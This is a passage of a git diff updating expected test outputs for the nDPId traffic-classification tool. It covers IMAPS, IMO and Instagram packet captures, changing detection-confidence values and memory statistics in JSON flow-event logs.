{"version":"TLSv1.2","client_requested_server_name":"mail.ntop.org","server_names":"mail.ntop.org","ja3":"4923a265be4d81c68ecda45bb89cdf6a","ja3s":"b653c251b0ee54c3088fe7bb997cf59d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, O=Let's Encrypt, CN=Let's Encrypt Authority X3","subjectDN":"CN=mail.ntop.org","fingerprint":"F1:9A:35:30:96:57:5E:56:81:28:2C:D9:45:A5:83:21:9E:E8:C5:DF"}} -00815{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":20,"source":"imaps.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":20,"flow_first_seen":1590857744659,"flow_last_seen":1590857744987,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":3856,"flow_avg_l4_payload_len":192,"midstream":0,"thread_ts_msec":1590857744987,"l3_proto":"ip4","src_ip":"192.168.1.8","dst_ip":"167.99.215.164","src_port":50506,"dst_port":993,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"}} +00951{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"imaps.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1590857744659,"flow_last_seen":1590857744710,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":227,"flow_tot_l4_payload_len":227,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":1590857744710,"l3_proto":"ip4","src_ip":"192.168.1.8","dst_ip":"167.99.215.164","src_port":50506,"dst_port":993,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mail.ntop.org","ja3":"4923a265be4d81c68ecda45bb89cdf6a","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +01008{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6,"source":"imaps.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1590857744659,"flow_last_seen":1590857744765,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1667,"flow_avg_l4_payload_len":277,"midstream":0,"thread_ts_msec":1590857744765,"l3_proto":"ip4","src_ip":"192.168.1.8","dst_ip":"167.99.215.164","src_port":50506,"dst_port":993,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mail.ntop.org","ja3":"4923a265be4d81c68ecda45bb89cdf6a","ja3s":"b653c251b0ee54c3088fe7bb997cf59d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384"}} +01212{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":7,"source":"imaps.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1590857744659,"flow_last_seen":1590857744765,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":3107,"flow_avg_l4_payload_len":443,"midstream":0,"thread_ts_msec":1590857744765,"l3_proto":"ip4","src_ip":"192.168.1.8","dst_ip":"167.99.215.164","src_port":50506,"dst_port":993,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mail.ntop.org","server_names":"mail.ntop.org","ja3":"4923a265be4d81c68ecda45bb89cdf6a","ja3s":"b653c251b0ee54c3088fe7bb997cf59d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, O=Let's Encrypt, CN=Let's Encrypt Authority X3","subjectDN":"CN=mail.ntop.org","fingerprint":"F1:9A:35:30:96:57:5E:56:81:28:2C:D9:45:A5:83:21:9E:E8:C5:DF"}} +00815{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":20,"source":"imaps.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":20,"flow_first_seen":1590857744659,"flow_last_seen":1590857744987,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":3856,"flow_avg_l4_payload_len":192,"midstream":0,"thread_ts_msec":1590857744987,"l3_proto":"ip4","src_ip":"192.168.1.8","dst_ip":"167.99.215.164","src_port":50506,"dst_port":993,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"}} 00554{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":20,"source":"imaps.pcap","alias":"nDPId-test","packets-captured":20,"packets-processed":20,"total-skipped-flows":0,"total-l4-payload-len":3856,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":2,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":11,"global_ts_msec":1590857744987} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 20/20 @@ -17,9 +17,9 @@ ~~ total active/idle flows...: 1/1 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5874942 bytes -~~ total memory freed........: 5874942 bytes -~~ total allocations/frees...: 118140/118140 +~~ total memory allocated....: 6008576 bytes +~~ total memory freed........: 6008576 bytes +~~ total allocations/frees...: 120902/120902 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 461 chars ~~ json string max len.......: 1217 chars diff --git a/test/results/imo.pcap.out b/test/results/imo.pcap.out index 0229fc7a3..846afba65 100644 --- a/test/results/imo.pcap.out +++ b/test/results/imo.pcap.out @@ -4,14 +4,14 @@ 00699{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"imo.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1646579366752,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":242,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":242,"pkt_l4_len":208,"thread_ts_msec":1646579366752,"pkt":"CL6sCxdumt9Y+uvcCABFAADkB2xAAEARIpLAqAypuZuJHsA3jrcA0NESgTwOaEjDNFXzxmxamfOGor3xFD3A7FnCXNc+hJhFKrJOPpMIHUdqj1x7ZYe+fmL104ZlZ8QSGjgMDxxGQ47M5ARZG9YmBTkKmoomp0C2r5k7+UuqXgkHofa9I06kfQJKjgPnNwBdZocQSlex2Z6G1oBdByRvxIbfLnB1AU5Z2+ssSUPzcUN05190AJa8ogAW0Cie1vmNKFuiNZVeV2v82D2eARVTcN232VacWZMHJ\/PcqQx4XLqiWe9HSh0LDQkCIZoCAAAAAAA="} 00877{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"imo.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1646579366752,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":371,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":371,"pkt_l4_len":337,"thread_ts_msec":1646579366752,"pkt":"CL6sCxdumt9Y+uvcCABFAAFlB21AAEARIhDAqAypuZuJHsA3jrcBUW71gkcNAABefWxEZ6P52eWWE1NsVUgX\/f\/SEU49gh0z128SrDnndBBJ7Xzv30Qrd+KJJN6jW88s97nwOxW1SXOJ19HPmvCIhrHR5EVDIS67bqqmEITlpL2AWZxihzDdfZ9+dgCuOQIy4YhI67L+NII4MlG7p6wa+Z43u8VCM7MQ94E5SdjxWl3zDFPxVycVf7KV2xCPfzi+nLVEj6bW7qHP3SW0XSDmXsZYCq\/fkVzkG6GD9VCFwOzRvPlMFOvXxrdNScJnQTp3jwA9ixJO\/EZEvZGmxF8KX1lLWK60\/AnhsK8ResfH4lG\/M+7QsKf8h+0F6\/JreyOlSKUahDlCIMAkz9CNbMMyQvDt1lT9Ujr+5G5FKQSNp7Os7CbxgGOrC+XUDj1qcRw+csAXbivPEt1405allpHSrfAa3hDWEw734vz46COasfJjrLY="} 00443{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"imo.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1646579366793,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":53,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":53,"pkt_l4_len":19,"thread_ts_msec":1646579366793,"pkt":"mt9Y+uvcCL6sCxduCABFAAAnWnIAADIRHkm5m4kewKgMqY63wDcAEwOhAAkDIZoCAAAAAAA="} -00637{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"imo.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1646579366752,"flow_last_seen":1646579366793,"flow_idle_time":200000,"flow_min_l4_payload_len":11,"flow_max_l4_payload_len":329,"flow_tot_l4_payload_len":540,"flow_avg_l4_payload_len":180,"midstream":0,"thread_ts_msec":1646579366793,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"185.155.137.30","src_port":49207,"dst_port":36535,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"IMO","breed":"Acceptable","category":"VoIP"}} +00637{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"imo.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1646579366752,"flow_last_seen":1646579366793,"flow_idle_time":200000,"flow_min_l4_payload_len":11,"flow_max_l4_payload_len":329,"flow_tot_l4_payload_len":540,"flow_avg_l4_payload_len":180,"midstream":0,"thread_ts_msec":1646579366793,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"185.155.137.30","src_port":49207,"dst_port":36535,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"IMO","breed":"Acceptable","category":"VoIP"}} 00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":19,"source":"imo.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1646579366870,"flow_last_seen":1646579366870,"flow_idle_time":200000,"flow_min_l4_payload_len":1,"flow_max_l4_payload_len":1,"flow_tot_l4_payload_len":1,"flow_avg_l4_payload_len":1,"midstream":0,"thread_ts_msec":1646579366870,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"93.33.47.58","src_port":49207,"dst_port":57604,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00431{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":19,"source":"imo.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1646579366870,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":43,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":43,"pkt_l4_len":9,"thread_ts_msec":1646579366870,"pkt":"CL6sCxdumt9Y+uvcCABFAAAdWdFAAEARh1LAqAypXSEvOsA34QQACf3yBw=="} 00431{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":24,"source":"imo.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1646579366906,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":43,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":43,"pkt_l4_len":9,"thread_ts_msec":1646579366906,"pkt":"mt9Y+uvcCL6sCxduCABFAAAd07xAADYRF2ddIS86wKgMqeEEwDcACY7ydg=="} 00578{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":27,"source":"imo.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1646579366927,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":149,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":149,"pkt_l4_len":115,"thread_ts_msec":1646579366927,"pkt":"mt9Y+uvcCL6sCxduCABFAACH071AADYRFvxdIS86wKgMqeEEwDcAc11kag0AAJobOdZhqhsqD3t\/ZsLZznm6P+VojS4Ym286bkA4KafGXg3iLF\/wjB8hr6WLuR7MT5lbl5UGnsPZptwcvPKKbJmOyY4TOPC9kAo6L6kDDYE4iSyFwPlyWfdtSAheyL2rRrc\/cATh7Qs="} -00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":28,"source":"imo.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1646579366870,"flow_last_seen":1646579366939,"flow_idle_time":200000,"flow_min_l4_payload_len":1,"flow_max_l4_payload_len":107,"flow_tot_l4_payload_len":119,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1646579366939,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"93.33.47.58","src_port":49207,"dst_port":57604,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"IMO","breed":"Acceptable","category":"VoIP"}} -00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":100,"source":"imo.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":65,"flow_first_seen":1646579366870,"flow_last_seen":1646579370091,"flow_idle_time":200000,"flow_min_l4_payload_len":1,"flow_max_l4_payload_len":1052,"flow_tot_l4_payload_len":18219,"flow_avg_l4_payload_len":280,"midstream":0,"thread_ts_msec":1646579370091,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"93.33.47.58","src_port":49207,"dst_port":57604,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"IMO","breed":"Acceptable","category":"VoIP"}} -00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":100,"source":"imo.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":35,"flow_first_seen":1646579366752,"flow_last_seen":1646579369944,"flow_idle_time":200000,"flow_min_l4_payload_len":10,"flow_max_l4_payload_len":1224,"flow_tot_l4_payload_len":12961,"flow_avg_l4_payload_len":370,"midstream":0,"thread_ts_msec":1646579370091,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"185.155.137.30","src_port":49207,"dst_port":36535,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"IMO","breed":"Acceptable","category":"VoIP"}} +00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":28,"source":"imo.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1646579366870,"flow_last_seen":1646579366939,"flow_idle_time":200000,"flow_min_l4_payload_len":1,"flow_max_l4_payload_len":107,"flow_tot_l4_payload_len":119,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1646579366939,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"93.33.47.58","src_port":49207,"dst_port":57604,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"IMO","breed":"Acceptable","category":"VoIP"}} +00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":100,"source":"imo.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":65,"flow_first_seen":1646579366870,"flow_last_seen":1646579370091,"flow_idle_time":200000,"flow_min_l4_payload_len":1,"flow_max_l4_payload_len":1052,"flow_tot_l4_payload_len":18219,"flow_avg_l4_payload_len":280,"midstream":0,"thread_ts_msec":1646579370091,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"93.33.47.58","src_port":49207,"dst_port":57604,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"IMO","breed":"Acceptable","category":"VoIP"}} +00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":100,"source":"imo.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":35,"flow_first_seen":1646579366752,"flow_last_seen":1646579369944,"flow_idle_time":200000,"flow_min_l4_payload_len":10,"flow_max_l4_payload_len":1224,"flow_tot_l4_payload_len":12961,"flow_avg_l4_payload_len":370,"midstream":0,"thread_ts_msec":1646579370091,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"185.155.137.30","src_port":49207,"dst_port":36535,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"IMO","breed":"Acceptable","category":"VoIP"}} 00556{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":100,"source":"imo.pcap","alias":"nDPId-test","packets-captured":100,"packets-processed":100,"total-skipped-flows":0,"total-l4-payload-len":31180,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":2,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":2,"total-idle-flows":2,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":15,"global_ts_msec":1646579370091} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 100/100 @@ -21,9 +21,9 @@ ~~ total active/idle flows...: 2/2 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5873403 bytes -~~ total memory freed........: 5873403 bytes -~~ total allocations/frees...: 118218/118218 +~~ total memory allocated....: 6007037 bytes +~~ total memory freed........: 6007037 bytes +~~ total allocations/frees...: 120980/120980 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 436 chars ~~ json string max len.......: 882 chars diff --git a/test/results/instagram.pcap.out b/test/results/instagram.pcap.out index 2bf99f23d..a03e7f144 100644 --- a/test/results/instagram.pcap.out +++ b/test/results/instagram.pcap.out @@ -4,71 +4,70 @@ 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"instagram.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1436720898354,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1436720898354,"pkt":"ABsv8H60QPMIw47hCABFAAA8TypAAEAGEYLAqABnrfxrBNw+AbsehKWiAAAAAKACOQjaPgAAAgQFtAQCCAoAA+qIAAAAAAEDAwY="} 00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2,"source":"instagram.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720898386,"flow_last_seen":1436720898386,"flow_idle_time":7580000,"flow_min_l4_payload_len":1365,"flow_max_l4_payload_len":1365,"flow_tot_l4_payload_len":1365,"flow_avg_l4_payload_len":1365,"midstream":1,"thread_ts_msec":1436720898386,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"31.13.93.52","src_port":33936,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 02316{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"instagram.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1436720898386,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":1431,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1431,"pkt_l4_len":1397,"thread_ts_msec":1436720898386,"pkt":"ABsv8H60QPMIw47hCABFAAWJa5BAAEAGjI7AqABnHw1dNISQAbuIwY4ypNSTmIAYARMTGgAAAQEICgAD6otaUmp7FwMBBVB9SXVyqGN\/Z0IQOrRWeDqy2ESAojaAx4QQZK8Nvn9P2WG4BrAo87sybB9iQ6L07zu3SJx\/yEENym+6oXOIueLurovz4xM5H+e2VkXRxNwq2D0zbcPaARfl1kqZ5lxozT2KxP5upnv5ZlZknUeHJ9iJUeI933878+9Wa2p3jAkSn4v+PhMZ8tdKr\/DbC4Dao9UoiB0NXUAr3Yz5mLZxqwvhp7T5JBYmrpug0k+c+c5jewd+5zMMLlTOh9zrkFpN\/SPdxljY89SWMG4iWok6qAWd81044WQFB8MMk6d1YEgnl4MTRR4s5nra0RAZ\/18nINKDy\/+7OtbIdykHRTDGdkzNglojGhlbMwXwCoSaU7eaC\/UG3QHuANJheRiTxBbb9LObDO61gFXBkdpo\/nFCQJ5DEAR9LRi5VbgUevhOk8v2CnW3NfU8tU\/NhXT2Fwav0PyuAxlku4R0TFjGrX0lMbSi5TfJsyWyqS9JUaHL9+9Lo2MolHMixycuQJ8OBJfxMjbh4vndGe6E5xjywRDhon5Ivpm51kbX7pr85erPPQ5esyd11\/S2GN1nyosTrQfKPFTMJ2PKe2m7QTQt+uAz\/lbUTHbMP5WXngggI0bC1v64BOTbVZvk5uSBRBJTxfNNwpu5Mu42yT2kpORmWxKLjzXxHI3WY0zq00CLVkZ1W4ZdSNXs14xkPKnh8GETvWNyrC0OkJAC\/senhsF4RXOoqIV\/fvDhI7Lz\/aB3VqgZGkZTiT2tG0nkNbTl36TNhCL0NMIpdEkg3CtkeHnRpYXxlFUaqjl0oiNlqmXrT3txeOlkpgLeE8sil6hQeUXLUDxeB\/KJ3hVWQV57tvquoi3TQ0mdlDPh3nKxwFekfGvexzie5JWVEiecROjBicDHlMGZSqgfGOOL9obBhKFQKyGkKwqvDD0GLpn+uVlqpq4HgYehGmZsXkGfKjhOvgYnCN46aHecrF2yix3uKy9HcGVhEh0jdkP6ZVKeYPjfh1VormnzwC798pJrA6FXeukKkQhENaxtIfjtfZqrhxgkGn44Wi6ohn6pe\/FHHmbNcPgV6V8fsqp75GNTcdW4payqjcXiRcbHyE8T1\/Qx4baiJDp6KLsZS4gAneRh+ALhxukKM03jbRUClXAh8oRiLl0u+SOlflfwh8goOCkzbht0yzBBd5s+YE\/rKLvLODamT6vRSajD988ioyLCTi6O7PjCpIz0x86CPfl59RFLMWfW1DDNxLLiQpG5QmdGA\/0xKZPtgucNxJfMg8zisuAsBotSOZNTt7iyYW\/IMjbjZfUDk2XnW0FMevjvN1dNSzxncEScDgEwhOZR\/bPFjnmrDfWVV5x9BRHI5MP8wUwSlhypizc+qxTGIgicImjYGkhAIz+xcFmXadM0YNZEvMZaj9aBOHMX1Oble6EYxmSHOrpQKqfzbWeMlvwrQYuci0kLy\/\/bshVduwlDBy5JYqDunQnZyDGNhNVfyaH+ng8KQ6sBqINnITFXfAnCkwXV\/HK1iUkb7QzoqBn3gpftCp83hNH0foudA8Gdf6kurlWwgMEOXi5BfTqlD4DwASXt9A68u1P9Zz8s0alrX2UlusB6fvL9Q9Js6MLwiQyj+bjdEcQ3Uplwrw6qLdouhHzsdgkMnVdwc2l5wv8KPOcXqmQvqjndZFz1nXaAVhwsFoo1zwY3LiNiYjhwWSYaeCHLdPVBHtAjW1OZFou+zyYe9X36AFhBBqrW+04QrWGvIhn1jD27wWhOa1bAC4ScjrpH0lKPe5njeedOXaKkZFE++EHilCzyFRBq6mDF3sb10u4yUIsQcfD4LLSh"} -00654{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2,"source":"instagram.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720898386,"flow_last_seen":1436720898386,"flow_idle_time":7580000,"flow_min_l4_payload_len":1365,"flow_max_l4_payload_len":1365,"flow_tot_l4_payload_len":1365,"flow_avg_l4_payload_len":1365,"midstream":1,"thread_ts_msec":1436720898386,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"31.13.93.52","src_port":33936,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"}} +00654{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2,"source":"instagram.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720898386,"flow_last_seen":1436720898386,"flow_idle_time":7580000,"flow_min_l4_payload_len":1365,"flow_max_l4_payload_len":1365,"flow_tot_l4_payload_len":1365,"flow_avg_l4_payload_len":1365,"midstream":1,"thread_ts_msec":1436720898386,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"31.13.93.52","src_port":33936,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"}} 00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"instagram.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1436720898475,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1436720898475,"pkt":"QPMIw47hABsv8H60CABFAAA05iNAAFUGAlAfDV00wKgAZwG7hJCk1JOYiMGTh4AQAE5t9QAAAQEIClpSq0YAA+qL"} 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"instagram.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1436720898499,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1436720898499,"pkt":"QPMIw47hABsv8H60CABFAAA8AABAAFIGTqyt\/GsEwKgAZwG73D5XFMWUHoSlo6ASOJBK1AAAAgQFlgQCCAq8TYT0AAPqiAEDAwg="} 00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"instagram.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1436720898499,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1436720898499,"pkt":"ABsv8H60QPMIw47hCABFAAA0TytAAEAGEYnAqABnrfxrBNw+AbsehKWjVxTFlYAQAOXaNgAAAQEICgAD6pe8TYT0"} -00974{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6,"source":"instagram.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1436720898354,"flow_last_seen":1436720898501,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":464,"flow_tot_l4_payload_len":464,"flow_avg_l4_payload_len":116,"midstream":0,"thread_ts_msec":1436720898501,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"173.252.107.4","src_port":56382,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1","client_requested_server_name":"telegraph-ash.instagram.com","ja3":"54ae5fcb0159e2ddf6a50e149221c7c7","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +00974{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6,"source":"instagram.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1436720898354,"flow_last_seen":1436720898501,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":464,"flow_tot_l4_payload_len":464,"flow_avg_l4_payload_len":116,"midstream":0,"thread_ts_msec":1436720898501,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"173.252.107.4","src_port":56382,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or 